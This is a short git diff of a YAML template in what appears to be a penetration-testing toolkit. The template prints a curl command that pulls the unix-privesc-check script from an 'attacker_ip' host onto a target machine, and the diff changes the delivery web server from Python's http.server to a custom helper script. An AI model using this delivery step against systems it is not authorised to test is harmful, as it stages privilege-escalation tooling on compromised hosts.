--- a/src/profi/templates/scripts/deliver-linux-unix-privesc-check.yaml
+++ b/src/profi/templates/scripts/deliver-linux-unix-privesc-check.yaml
@@ -11,4 +11,4 @@ content: |
   echo '                       -----Linux------                         '; \
   echo 'Deliver only: curl http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/unix-privesc-check -o -o <%=$(esh variables/delivery_path_linux)%>/unix-privesc-check'; \
   echo '================================================================'; \
-  python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+  python -m <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
